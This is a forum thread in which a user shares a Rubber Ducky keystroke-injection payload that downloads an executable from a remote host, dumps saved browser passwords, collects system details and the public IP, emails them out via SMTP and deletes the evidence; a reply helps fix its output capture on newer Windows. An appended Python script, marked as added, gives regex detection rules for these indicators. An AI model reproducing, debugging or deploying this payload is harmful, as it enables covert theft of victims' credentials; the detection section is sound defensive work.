Robert.sz

grab browsers password

Hello, I'm wondering if it is possible to use if and else statements with the Rubber Ducky.

I am trying to make a payload to grab browser passwords and send them to an email address, but it works in Windows 7 and doesn't work in Windows 8 and 10.

Here is my payload:

DELAY 1000
GUI r
DELAY 500
STRING cmd /T:01 /K \"@echo
ENTER
DELAY 500
STRING mode con:cols=15 lines=1
ENTER
DELAY 500
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','%TEMP%\web.exe');
ENTER
DELAY 500
STRING cd %tmp%
ENTER
DELAY 500
STRING systeminfo | findstr /c:"Registered Owner" /c:"System Type" /c:"Host Name" /c:"Domain" /c:"OS Name" > info.txt
DELAY 500
ENTER
STRING nslookup myip.opendns.com. resolver1.opendns.com | findstr "Address" > info.txt
ENTER
DELAY 500
STRING start web.exe /stext pwd.txt
ENTER
DELAY 500
REM -------------email log
STRING powershell
ENTER
DELAY 500
STRING $SMTPServer = 'smtp.mail.yahoo.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('user@yahoo.com', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'user@yahoo.com'
ENTER
STRING $ReportEmail.To.Add('user2@yahoo.com')
ENTER
STRING $ReportEmail.Subject = 'Duck Report'
ENTER
STRING $ReportEmail.Body = 'Attached is your duck report.'
ENTER
STRING $ReportEmail.Attachments.Add('pwd.txt')
ENTER
STRING $ReportEmail.Attachments.Add('info.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 500
REM ---------------------delete and end
STRING del web.exe
ENTER
DELAY 500
STRING exit
ENTER
DELAY 500
STRING del pwd.txt
ENTER
DELAY 500
STRING del info.txt
ENTER
DELAY 100
STRING exit
ENTER

My problem is that this line, "STRING start web.exe /stext pwd.txt", doesn't work on Windows 8 and 10, only on Windows 7.

I tried doing it this way, "STRING start web.exe /stext > pwd.txt"; it creates a pw.txt, but it is empty.

Any idea is appreciated!


You might want to try using cmd to capture the output? You can try

STRING cmd web.exe > pw.txt 

That may be a simple fix; however, if you are still not capturing the information, you may wish to try

STRING cmd web.exe > pw.txt 2>&1

This means that you will capture the error output as well (where it may be getting written). For a more detailed description, have a look into stream 1 (STDOUT) and stream 2 (STDERR) outputs.

Hope that helps.
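
Seen from the defender's side, the command lines in the payload quoted in this thread leave traces in process-creation and PowerShell script-block logs. The following is an added example, not part of the original thread, that flags a host when several of those traces occur close together; the event format, host names, time window and threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Indicators taken from the command lines in the payload quoted above.
RULES = {
    "download_to_temp": re.compile(r"DownloadFile\(.*\\Temp\\", re.I),
    "stext_export": re.compile(r"\s/stext\s+\S+", re.I),
    "external_ip_lookup": re.compile(r"myip\.opendns\.com", re.I),
    "smtp_client": re.compile(r"Net\.Mail\.SmtpClient", re.I),
}

def match_rules(text):
    """Return the set of rule names whose pattern occurs in one log line."""
    return {name for name, rx in RULES.items() if rx.search(text)}

def correlate(events, window=300, threshold=3):
    """Alert per host when >= threshold distinct rules fire within window seconds."""
    hits = defaultdict(list)  # host -> [(time, rule)]
    for ev in events:
        for rule in match_rules(ev["text"]):
            hits[ev["host"]].append((ev["time"], rule))
    alerts = {}
    for host, items in hits.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {r for t, r in items[i:] if t - start <= window}
            if len(seen) >= threshold:
                alerts[host] = sorted(seen)
                break
    return alerts

# Constructed sample events (not real logs): seconds since start, host, text.
SAMPLE = [
    {"time": 0, "host": "WS01", "text": r"powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/web.exe','C:\Users\a\AppData\Local\Temp\web.exe');"},
    {"time": 3, "host": "WS01", "text": "nslookup myip.opendns.com. resolver1.opendns.com"},
    {"time": 5, "host": "WS01", "text": "web.exe /stext pwd.txt"},
    {"time": 9, "host": "WS01", "text": "$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"},
    # WS02: single indicators far apart in time should not raise an alert.
    {"time": 2, "host": "WS02", "text": "nslookup myip.opendns.com. resolver1.opendns.com"},
    {"time": 4000, "host": "WS02", "text": r"C:\Tools\report.exe /stext out.txt"},
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE).items():
        print(host, rules)
```

Requiring several distinct indicators in a short window keeps a lone `/stext` or a lone IP lookup from alerting on its own, which is why WS02 stays quiet in the sample.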
